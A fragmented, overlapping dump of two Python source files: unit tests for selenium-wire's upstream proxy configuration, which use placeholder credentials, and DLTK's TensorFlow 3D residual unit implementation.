"get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https':", "https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy =", "'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options)", "test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ):", "self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily set environment", "from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': {", "NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password)", "variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost',", "https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy)", "http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined in env variables", "test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with", "http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that", "https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options =", "= get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport)", "'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http =", "self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = {", "self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888',", "https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy':", "} with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme)", "options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } }", "self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport)", "https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy':", "https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888',", "dict config overrides that defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme)", "{ 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'):", "None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used", "with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1',", "get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https", "test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' }", "config overrides that defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3',", "self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager", "def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost'", "http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost',", "self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides", "= proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict", "The dict config overrides that defined in env variables https = proxy['https'] self.assertEqual('https',", "in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888',", "self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy", "'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http',", "self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with", "proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def", "seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http':", "self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None", "import os from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def", "'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options)", "os from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self):", "self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined in env variables https", "'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http']", "= get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily", "'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme)", "NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password)", "'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http", "from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options", "proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888',", "self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined", "\"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try:", "@contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ", "class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888',", "get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https", "http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https =", "https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy'])", "} } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1',", "proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self):", "get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily set", "proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888',", "http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2',", "self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options", "self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password)", "https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http", "def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self,", "proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\"", "= { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888',", "HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1',", "HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1',", "self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({})", "TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy':", "def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http',", "http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined in", "proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self):", "self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost'", "contextlib import os from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase):", "= None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager", "proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https',", "= proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https']", "# The dict config overrides that defined in env variables https = proxy['https']", "def set_env(self, **environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ =", "with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1',", "= proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def", "self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy =", "used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try: yield finally:", "self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({},", "} } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http',", "'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy", "options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context", "= proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def", "**environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ)", "proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to", "test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme)", "import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888',", "import contextlib import os from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class", "self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme)", "options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888',", "import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = {", "http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888',", "https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy'])", "to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try: yield finally: os.environ.clear()", "defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password)", "set_env(self, **environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ)" ]
[ "**kwargs): super().__init__(*args, **kwargs) # More code here if needed raise SpecialError('stuff and things',", "def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here if needed raise", "SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here if needed", "<reponame>Xithrius/Examples class BaseErrorInheretence(Exception): pass class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) #", "super().__init__(*args, **kwargs) # More code here if needed raise SpecialError('stuff and things', error='something", "__init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here if needed raise SpecialError('stuff", "*args, **kwargs): super().__init__(*args, **kwargs) # More code here if needed raise SpecialError('stuff and", "pass class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here", "class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here if", "BaseErrorInheretence(Exception): pass class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code", "**kwargs) # More code here if needed raise SpecialError('stuff and things', error='something happened')", "class BaseErrorInheretence(Exception): pass class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More" ]
[ "padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel", "(None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor:", "<NAME> et al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs", "= x # Handle strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x,", "a 3D residual unit according to [1]. This implementation supports strided convolutions and", "else k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode", "Handle strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid')", "input shape' x = inputs orig_x = x # Handle strided convolutions if", "activation function. use_bias (bool, optional): Train a bias with each convolution. kernel_initializer (TYPE,", "EVAL or PREDICT activation (optional): A function to use as activation function. use_bias", "as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False,", "tf.Tensor: Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding':", "__future__ import print_function from __future__ import division from __future__ import absolute_import import tensorflow", "the strided conv kernel size to prevent losing information k = [s *", "used in the sub units strides (tuple, optional): Convolution strides in (x,y,z) of", "the sub units. kernel_size (tuple, optional): Size of the convoltional kernels used in", "output filters. [1] <NAME> et al. Identity Mappings in Deep Residual Networks. ECCV", "Train a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels", "with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent losing information", "zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x", "strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT", "# Handle differences in input and output filter sizes if in_filters < out_filters:", "0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent losing", "bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE,", "== inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input shape' x =", "1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]])", "sub unit 0. Allows downsampling of the input tensor via strides convolutions. mode", "# Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN)", "Convolution strides in (x,y,z) of sub unit 0. Allows downsampling of the input", "of a 3D residual unit according to [1]. This implementation supports strided convolutions", "units. kernel_size (tuple, optional): Size of the convoltional kernels used in the sub", "__future__ import division from __future__ import absolute_import import tensorflow as tf import numpy", "kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns:", "use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according", "\\ 'Module was initialised for a different input shape' x = inputs orig_x", "and output filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0,", "Args: inputs (tf.Tensor): Input tensor to the residual unit. Is required to have", "y, z, channels]). out_filters (int): Number of convolutional filters used in the sub", "optional): Additional regularisation op Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op", "in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1)", "tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer,", "to use as activation function. use_bias (bool, optional): Train a bias with each", "<reponame>themantalope/DLTK<filename>dltk/core/residual_unit.py from __future__ import unicode_literals from __future__ import print_function from __future__ import division", "tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters)", "1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input", "kernel_size (tuple, optional): Size of the convoltional kernels used in the sub units", "2016. Args: inputs (tf.Tensor): Input tensor to the residual unit. Is required to", "'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module", "and output filters. [1] <NAME> et al. Identity Mappings in Deep Residual Networks.", "# Handle strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides,", "+ [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif", "a different input shape' x = inputs orig_x = x # Handle strided", "Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the residual unit. Is", "Allows downsampling of the input tensor via strides convolutions. mode (str, optional): One", "with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional):", "absolute_import import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3,", "implementation supports strided convolutions and automatically handles different input and output filters. [1]", "orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters", "import unicode_literals from __future__ import print_function from __future__ import division from __future__ import", "ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the residual unit. Is required", "(x,y,z) of sub unit 0. Allows downsampling of the input tensor via strides", "different input and output filters. [1] <NAME> et al. Identity Mappings in Deep", "Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional):", "orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): #", "tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent losing information k", "out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x +=", "vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(),", "out_filters (int): Number of convolutional filters used in the sub units. kernel_size (tuple,", "the residual unit. Is required to have a rank of 5 (i.e. [batch,", "5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number of convolutional filters", "strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv", "in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x", "Adjust the strided conv kernel size to prevent losing information k = [s", "from __future__ import print_function from __future__ import division from __future__ import absolute_import import", "Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the residual", "== tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params)", "activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to", "x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size,", "if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit", "according to [1]. This implementation supports strided convolutions and automatically handles different input", "= tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual", "bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to [1]. This", "have a rank of 5 (i.e. [batch, x, y, z, channels]). out_filters (int):", "(tuple, optional): Size of the convoltional kernels used in the sub units strides", "of 5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number of convolutional", "activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1", "out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[", "unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent", "strides in (x,y,z) of sub unit 0. Allows downsampling of the input tensor", "filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] *", "of the input tensor via strides convolutions. mode (str, optional): One of the", "via strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or", "(i.e. [batch, x, y, z, channels]). out_filters (int): Number of convolutional filters used", "in the sub units strides (tuple, optional): Convolution strides in (x,y,z) of sub", "__future__ import absolute_import import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs,", "'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters =", "tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x += orig_x return x", "unit according to [1]. This implementation supports strided convolutions and automatically handles different", "in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x)", "if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) -", "of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to use", "handles different input and output filters. [1] <NAME> et al. Identity Mappings in", "channels]). out_filters (int): Number of convolutional filters used in the sub units. kernel_size", "in input and output filter sizes if in_filters < out_filters: orig_x = tf.pad(", "assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input shape'", "out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None,", "sub units strides (tuple, optional): Convolution strides in (x,y,z) of sub unit 0.", "shape' x = inputs orig_x = x # Handle strided convolutions if np.prod(strides)", "Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same',", "unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer,", "> out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x", "kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters ==", "as tf import numpy as np def 